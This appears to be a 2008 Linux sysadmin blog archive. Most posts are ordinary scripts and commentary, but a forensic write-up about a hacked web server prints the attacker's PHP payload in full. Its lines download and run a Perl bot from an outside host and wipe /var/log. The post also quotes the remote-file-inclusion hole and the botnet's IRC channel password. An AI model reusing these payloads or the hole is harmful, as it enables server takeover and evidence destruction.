mailNewRecordings: Script for reporting Dreambox recordings

March 28, 2008

I’ve written a small script which reports, via email, the recordings of my Dreambox 500 receiver (running a Gemini image), which writes its data onto my Linux file server. This is useful because I’ve configured the Dreambox to record some series automatically. The script can run on the file server (as in my case) or on the Dreambox itself (if it has Python installed). It is configurable via an ini file and reports the new recordings, including the description text provided by the EPG during the recording. A summary of all stored recordings is appended at the bottom of the mail, together with the amount of space used by the recordings and the remaining storage space. Call the script via cron once a day. Ah, and here is the link to the script: mailNewRecordings-0.1.tar.bz2
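
The tarball above is the real thing; just to illustrate the idea, a stripped-down sketch could look like this (the paths, ini sections, option names, the .ts extension and the marker-file approach are all invented for the example, not necessarily what the script actually uses):

#!/usr/bin/env python3
# Stripped-down illustration: mail a report of recordings newer than
# the last run, plus the free space on the recording share.
import os
import smtplib
import configparser
from email.mime.text import MIMEText

cfg = configparser.ConfigParser()
cfg.read('mailNewRecordings.ini')
path = cfg.get('recordings', 'path')           # e.g. /srv/dreambox
stamp = os.path.join(path, '.lastrun')         # marker file of the last run
last = os.path.getmtime(stamp) if os.path.exists(stamp) else 0

# pick the recording files which are newer than the marker file
new = sorted(f for f in os.listdir(path)
             if f.endswith('.ts')
             and os.path.getmtime(os.path.join(path, f)) > last)

st = os.statvfs(path)
free_gb = st.f_bavail * st.f_frsize / 1024.0 ** 3

msg = MIMEText('New recordings:\n%s\n\nFree space: %.1f GB\n'
               % ('\n'.join(new) or '(none)', free_gb))
msg['Subject'] = 'Dreambox recordings'
msg['From'] = cfg.get('mail', 'from')
msg['To'] = cfg.get('mail', 'to')

with smtplib.SMTP(cfg.get('mail', 'smarthost')) as smtp:
    smtp.sendmail(msg['From'], [msg['To']], msg.as_string())

open(stamp, 'w').close()                       # remember this run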

A tale of searching for a hacker and his supporter, the idiot programmer

March 14, 2008

A few days ago a friend called me: one of his web servers had shown a spike in the router’s traffic monitoring. Over 2 GB in one hour was not normal for this server, so he asked me to take a look, which I did, and which was the start of a journey. The first command I executed after logging in was top, which reported the following:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
17448 www-data 25 0 48580 33m 5876 R 24 2.4 380:07.76 apache2
3117 www-data 25 0 6232 4392 1424 R 23 0.3 932:05.18 perl
3105 www-data 25 0 6232 4240 1272 S 19 0.3 687:54.80 perl
17447 www-data 25 0 44804 30m 5804 R 13 2.2 357:28.33 apache2

That did not look normal. I asked my friend if he was using Perl on the web server. He told me it was only used for AWStats, and that he uses the version which comes with the distribution, which should therefore be up to date. When I took a look with ps aux I could not find any perl process; the processes with the PIDs shown above had the “name” /usr/sbin/apache2 -k start -DSSL, which was also the output of cat /proc/3117/cmdline. I wanted to know what the parent process was, so I ran the following:

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm

This showed the correct process name, but it also showed that init (PID 1) was the parent process, which should not be possible. Now that looked really bogus, so I ran netstat -anp, which showed me the following:

tcp 0 0 88.xxx.xxx.xxx:57350 194.109.20.90:6666 ESTABLISHED 3105/apache2 -k sta

A telnet 194.109.20.90 6666 showed me that this was a normal IRC server from the undernet.org network. Now I was sure that someone had hacked my friend’s machine. I started my search for files the attacker had created with the following commands:

touch -d "10 march 2008 20:00:00" date_marker
find / -newer date_marker > long_list.txt

I walked through the results with my friend, but there were no files which were created by the attacker, so it seems the attacker knew at least some techniques to hide his traces. The Apache logfiles didn’t help either, as I didn’t know when the infection took place or via which of the > 40 vhosts (some used by customers to upload their own stuff), which generated many entries even in the error log. I also made sure that no system files had been changed or replaced, and I’m quite sure now that the attacker stayed within the www-data user. So I restarted the server, confirmed that the system was clean again, and decided to see how long a reinfection would take. It was by now already late in the night, as I had been called in the evening, so I started a tcpdump on all non-standard ports before I went to bed.
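
As an aside, this kind of argv[0] masquerading can also be spotted programmatically, by comparing the process name the kernel keeps with the name the process advertises in its command line. A rough Python sketch of the idea (Linux /proc assumed; the heuristic is noisy, e.g. login shells rename themselves legitimately):

#!/usr/bin/env python3
# Flag processes whose kernel-side name (comm, from /proc/PID/stat)
# differs from the name they advertise via argv[0] in /proc/PID/cmdline.
import os

for pid in filter(str.isdigit, os.listdir('/proc')):
    try:
        with open('/proc/%s/stat' % pid) as f:
            # comm is the second field, enclosed in parentheses
            comm = f.read().split('(', 1)[1].rsplit(')', 1)[0]
        with open('/proc/%s/cmdline' % pid) as f:
            argv0 = f.read().split('\0')[0]
    except (IOError, IndexError):
        continue  # process vanished or is unreadable
    # the kernel truncates comm to 15 characters, so compare accordingly
    base = os.path.basename(argv0.split(' ')[0])[:15]
    if argv0 and base != comm:
        print('%s: comm=%r but argv[0]=%r' % (pid, comm, argv0))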

The next day the system was infected again, but now I had only 12 hours to cover. I downloaded the tcpdump raw packet file to my notebook and took a look at it with Wireshark. I first filtered for ports 6665 to 6669, and as I guessed that the first connection attempt was also the infection time, I now knew when it happened. I got the time, but I also got more – the complete IRC data the bot uses to connect and wait for its master:

IRC network: undernet.org
Channel: #vx.
Channel password: .BushMaster.

A look into the channel showed that only 30 nicks were present, but that more than one operator was there, searching for new victims in a systematic way, as every 10-20 minutes a new nick joined. But that is another story for another post (maybe).

Now I knew the infection time, and I found something in the Apache error log, right between the regular log entries:

[Thu Mar 13 04:14:13 2008] [error] [client xxx.xxx.xxx.xxx] File does not exist: /home/xxxxxxxx/robots.txt
[Thu Mar 13 04:18:51 2008] [error] [client xxx.xxx.xxx.xxx] Negotiation: discovered file(s) matching request: xxxxxxxxxxxxx (None could be negotiated).
--04:20:17-- http://www.wolffilm.de/s.txt
=> `s.txt'
Resolving www.wolffilm.de... 217.160.103.90
Connecting to www.wolffilm.de|217.160.103.90|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104,328 (102K) [text/plain]
0K .......... .......... .......... .......... .......... 49% 1.14 MB/s
50K .......... .......... .......... .......... .......... 98% 3.75 MB/s
100K . 100% 21.89 MB/s
04:20:17 (1.78 MB/s) - `s.txt' saved [104328/104328]

I tried at once to download that file, but it was not there anymore. I searched for the file on the web server; it was not there either. I then searched for any other wget entries in the Apache error log and found an earlier one – the original infection.

But what now? The system was set up in a way that I didn’t have all logfiles in one place, and they were also not complete or really usable. And with > 40 vhosts it would have taken ages, so I decided to do a full tcpdump of all traffic going to and from the server after a restart, to monitor the reinfection. I ran

ps axo stat,euid,ruid,tty,tpgid,sess,pgrp,ppid,pid,pcpu,comm | grep perl

every few hours to check whether a reinfection had already happened; if not, I restarted tcpdump to reset the raw packet file. After I came back from the monthly LUGT meeting (Linux User Group Tirol), the system was infected again and I had > 6 GB of tcpdump trace. But now I knew what to look for: the wget entries. I found them at Thu Mar 13 21:34:42 2008, and used tcpslice to extract the time frame that was interesting for me:

tcpslice -w attack.raw 2008y3m13d21h30m +600 dump-02.raw

After downloading the file onto my poor old notebook, I searched in Wireshark for the same timestamp and found the break-in:

GET /pages.php?content=http://www.flying-swan.de/s? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.xxxxxxx.xxxx
User-Agent: libwww-perl/5.805

which triggered the following action by the web server:

GET /s?.php HTTP/1.0
Host: www.flying-swan.de

HTTP/1.1 200 OK
Date: Thu, 13 Mar 2008 20:33:12 GMT
Server: Apache/1.3.34 Ben-SSL/1.55
Last-Modified: Thu, 13 Mar 2008 20:30:15 GMT
ETag: "930958-119a-47d98ed7"
Accept-Ranges: bytes
Content-Length: 4506
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

<?
exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
shell_exec("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
system("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
passthru("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
popen("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
popen("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
proc_open("cd /tmp;wget http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;curl -O http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lwp-download http://www.flying-swan.de/s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;GET http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;fetch http://www.flying-swan.de/s.txt>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*", "r");
proc_open("cd /tmp;lynx -source http://www.flying-swan.de/s.txt>>s.txt;perl s.txt;perl s.txt;rm -rf s.txt s.txt*");
exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
shell_exec("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
system("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
passthru("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd");
popen("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
proc_open("rm -rf /var/log/*>>/dev/null;killall -9 php mech inetd eggdrop httpd", "r");
unlink("/tmp/sess_e00dd4lbo2ad2758n9fc641e47cd76x9");
unlink("s.txt");
unlink("s.txt*");
unlink(".bash_history");
?>

which then downloaded the Perl script I attached here … It is worth a look. After all this work I was curious what the PHP script looked like which was used to gain access to the server. Let’s take a look at the interesting parts of the pages.php file:

<!--Fireworks 8 Dreamweaver 8 target. Created Tue Dec 18 21:07:03 GMT+0100 2007-->
....
<td height="21" colspan="2" bgcolor="#C9CACC">   <a href="./">Home</a> | <a href="pages.php?content=info">Information</a> | <a href="pages.php?content=progr">Programm</a> | <a href="pages.php?content=anmeld">Anmeldung</a> </td>

and finally:

<?php include($_GET[content].".php");?>

So the script appends “.php” to whatever is passed in the content parameter and feeds it straight into include() – and the trailing “?” in the attacker’s URL turns that appended “.php” into a harmless query string, which is why the capture above shows GET /s?.php: the server fetched the attacker’s code and executed it. Argh .. I’m going to kill this idiot programmer … who is still that damn stupid in 2008? I can’t believe it – how can someone like this call himself a programmer? I deactivated the whole website and told my friend that he should send the programmer an invoice for the hours I needed to trace down something this stupid. That is what I can only call wantonly negligent. I also need to talk to my friend about the security of his web server, but I believe this hole was opened on request of the idiot .. ah sorry … programmer.

Amazon MP3 with Linux downloader

March 4, 2008

I don’t really know why a special client program is necessary in the first place, but still, it is time to celebrate a little bit. Amazon has announced the beta version of a Linux client for their music download portal, which already has the full functionality. The software is provided as binary packages for Ubuntu 7.10, Debian 4.0, Fedora 8 and openSUSE 10.3 (sorry, no source available). The music itself is DRM-free and provided as high-quality MP3 files.

It seems that Linux is now getting more awareness in the desktop field, which is good. But I still don’t understand why Amazon does not build an AJAX-enhanced web site, as their competence lies in that area. What I would like to see is an open API for accessing the portal/music, so it could be integrated into Amarok or similar open source programs.

Disk encryption broken due to cooled memory

February 22, 2008

The hard disk and file encryption systems BitLocker (Vista), dm-crypt, TrueCrypt and Apple’s FileVault were previously believed to be safe. This is no longer the case! Researchers from Princeton University published a video in their blog showing how to extract the encryption key stored in memory. The attack vector in this case is the DRAM, which does not lose its state immediately after a power cut – the contents survive for some seconds or even minutes, and by cooling the memory (-50°C) this can be extended even further.

The researchers then boot a mini program which dumps the memory onto a USB hard disk. A second program then searches this dump for the key. Take a look at the video; it is really well done!


My first thought for being at least a little bit more secure: do not use standby mode, but switch the computer off completely. This at least limits the window for an attacker to a few minutes, but it is not a real solution. A solution would be special RAM for storing the key which clears itself when the power is cut. This could be done with a capacitor which provides just enough power to wipe the memory.

Does someone have a better or different idea?

Script for deleting files older than x days

February 16, 2008

I operate some mail servers where I run two different virus scanners. The first one is engaged during the SMTP handshake and rejects malicious mails. The second one is invoked before the maildrop filter; if this one detects malware, the attachment is removed from the mail and stored in a quarantine directory. The user is informed about the removal in this case, so he can write me a mail if he wants the file – but most users will never ask for the files, so I needed a script which deletes all files in the quarantine directory that are older than a configured number of days.

delete_old_files.py is this script, which I call via crond like this:


# m h dom mon dow command
23 23 * * * /usr/local/sbin/delete_old_files.py /var/quarantine/ 30

This is a general-purpose script which should also be helpful in other scenarios.
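
The linked script is the authoritative version; its core boils down to something like this sketch:

#!/usr/bin/env python3
# Core idea of delete_old_files.py: remove every file below a
# directory whose modification time is older than N days.
# Usage: delete_old_files.py <directory> <days>
import os
import sys
import time

def delete_old_files(directory, days):
    cutoff = time.time() - days * 86400   # N days in seconds
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if os.path.getmtime(path) < cutoff:
                os.remove(path)

if __name__ == '__main__':
    delete_old_files(sys.argv[1], int(sys.argv[2]))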

iptables firewall scripts updated

February 12, 2008

I’ve just moved my iptables firewall scripts from the old server to my blog, and I updated the scripts with some new tricks I learned over the last years. I have (modified) versions of these scripts running on all of my servers, as they provide an easy starting point which saves much time. The rules are easy enough to understand and change, and I’m not a fan of complicated iptables rules you won’t understand without a special GUI. If something is that complex, it will have holes in it! I hope these scripts show you that iptables is not complicated. Have fun and be secure.

Ubuntu grows into the Enterprise

February 11, 2008

Matt Asay writes about Alfresco’s Open Source Barometer survey, which shows that Ubuntu is the fastest-growing Linux distribution. I won’t repeat the exact values here – read the original blog entry.
What I want to talk about is that (K)Ubuntu is normally thought to be strong in the end-user desktop market, but Alfresco has mostly enterprise customers, which leads to the conclusion that Ubuntu also has an impact at the enterprise level. I started deploying Ubuntu side by side with Debian on servers, and especially on desktops, with the first Ubuntu LTS release, but I thought that was just me. It seems I was wrong – some other guys are also installing it in the enterprise ;-).

I like that move, as Ubuntu provides the same distribution for free and with a support contract. With RHEL I would need to choose a clone like CentOS for some less important servers, which at least in the past did not provide every package RHEL provided. With Ubuntu I can use the same setup and maintenance process for all of my servers, and that is especially important as I use OpenVZ a lot, which leads to many installed Ubuntu systems. Now I only hope that even more Linux systems get deployed in the enterprise and that Ubuntu takes a fair share of that piece of the market.

Backup of Appliances: Login and Download

February 5, 2008

I sometimes have the problem that I want to back up a device which has only a web interface (e.g. an appliance). Most of them provide a possibility for this: after a successful login you only need to click the backup link/button in the browser to get a file with the backup. So why am I writing a whole post about this topic?

It is because I don’t want to do it myself; I want it done automatically every night – and now it is not that trivial anymore. Why would I want a backup every night? You might say I could just make a backup every time I change something. I don’t think that is a good idea, and besides, I’m too lazy for that.

I normally use cURL for this task, which I will illustrate with a backup script for a Vlines appliance (an Asterisk server appliance). Take a look at the source:


#!/bin/bash
url=https://xxx.xxx.xxx.xxx
cookieFile=/tmp/vlines_cookie.jar
configFile=accessvoip.vlines
#-----------
curl -d "username=XXX&passwort=XXXX" -c $cookieFile $url/index.php
curl -s -S -b $cookieFile $url/save.php > $configFile
curl -s -S -b $cookieFile $url/logout.php
rm $cookieFile

As you can see, it is really easy. cURL can store cookies, which this appliance uses for the user session, and the login credentials are provided as POST parameters to the server. After a successful login we just fetch the backup file and log out.

As you can see, I use a fixed filename for storage – this is because the script is called by rsnapshot, which compares the output of the script with the last run and provides hardlink-based snapshots. rsnapshot also sends me a mail if anything within the script produced output (= indicating an error).
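
Hooking such a script into rsnapshot is done via its backup_script directive; the relevant rsnapshot.conf line could look something like this (the script path and destination directory are made up for the example, and note that rsnapshot wants tabs between the fields):

# rsnapshot.conf excerpt – fields must be separated by tabs
backup_script	/usr/local/sbin/backup_vlines.sh	vlines/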

This script should be easy to adapt to your device/appliance – access point, router, environment monitor, …. Have fun and be secure.

ovpnCNcheck — an OpenVPN tls-verify script

February 2, 2008

If you’re running an OpenVPN server, you may have asked yourself how you can decide which clients are allowed to connect, even if they were all signed by the same CA. A common case arises if you provide more than one OpenVPN server but not all clients should be able to connect to every one. Sure, it would be possible to use a separate CA for each server, but that would not be flexible: the clients would need more than one certificate/key pair, and to enable or disable a client’s access to a certain server you would need to generate or revoke its certificate. Not a good idea!

I’ve therefore written two scripts which solve this problem. They check whether the peer is in the allowed user list by matching the CN (common name) of the X.509 certificate against a provided text file. For example, in OpenVPN you could use the directive:

tls-verify "/usr/local/sbin/ovpnCNcheck.py /etc/openvpn/userlist.txt"

This causes the connection to be dropped unless the client’s common name is listed in userlist.txt. The bash script just checks whether the common name matches one of the lines (one CN per line), while the Python version interprets each line as a regular expression. In that case every line should hold one regular expression, which can also be just a plain common name (don’t forget to escape characters like .?^()[]\ with a \). Empty lines and lines starting with a # are ignored. The bash version also works on an “out of the box” OpenWrt installation.

Python version: ovpncncheck.py
Bash version: ovpncncheck.sh
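
To give an idea of what happens inside (the downloads above are the authoritative versions): OpenVPN appends the certificate depth and the X.509 subject string to the tls-verify command, so the Python variant boils down to something like this sketch:

#!/usr/bin/env python3
# Sketch of the CN check: OpenVPN calls this with the userlist file
# (our own argument), the certificate depth and the X.509 subject.
# Exit code 0 accepts the peer, anything else rejects it.
import re
import sys

userlist, depth, subject = sys.argv[1], sys.argv[2], sys.argv[3]

if depth != '0':
    sys.exit(0)   # only the client certificate itself is checked

m = re.search(r'CN=([^/,]+)', subject)   # subject format varies a bit
cn = m.group(1) if m else ''

with open(userlist) as f:
    for line in f:
        line = line.strip()
        if not line or line.startswith('#'):
            continue   # skip comments and empty lines
        if re.match(line + r'$', cn):   # assumes valid expressions
            sys.exit(0)   # CN matched -> accept the connection
sys.exit(1)   # no match -> drop the connection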

Hope it helps you!

How to mark mails as read/seen at delivery with the courier maildrop filter?

January 30, 2008

There is no clean way to do this, but I still needed it, so I wrote this hack. Use it at your own risk. I’m using it for the spam mails I get, which have been marked by SpamAssassin. These mails should be delivered into the Junk folder and be marked as read, so only new ham messages are counted/shown when I open my mailbox.

Download the markAsSeen.py script to /usr/local/sbin/ and set the executable flag. Then you only need to add the following to the desired ~/.mailfilter file:


# filter spam mails and mark them as read
if ((/^X-Spam-Flag:.*YES/))
{
  cc "./Maildir/.Junk/."
  JUNK=`/usr/local/sbin/markAsSeen.py "./Maildir/.Junk/."`
  exit
}

Important: This script is only safe to use if all messages in a given folder should be marked as read!!
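
The trick behind the script is plain Maildir semantics: a message counts as new while it sits in new/ and as seen once it lives in cur/ with the S flag in its info suffix. A minimal sketch of that operation (the linked script is the real one):

#!/usr/bin/env python3
# Mark every message in a Maildir folder as seen by moving it
# from new/ to cur/ with the 'S' (seen) flag appended.
# Argument: path to the Maildir folder, e.g. ./Maildir/.Junk/
import os
import sys

folder = sys.argv[1]
new_dir = os.path.join(folder, 'new')
cur_dir = os.path.join(folder, 'cur')

for name in os.listdir(new_dir):
    # Maildir convention: '<name>:2,<flags>', where 'S' means seen
    os.rename(os.path.join(new_dir, name),
              os.path.join(cur_dir, name + ':2,S'))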

If you have a better way to mark messages as read on delivery, tell me!
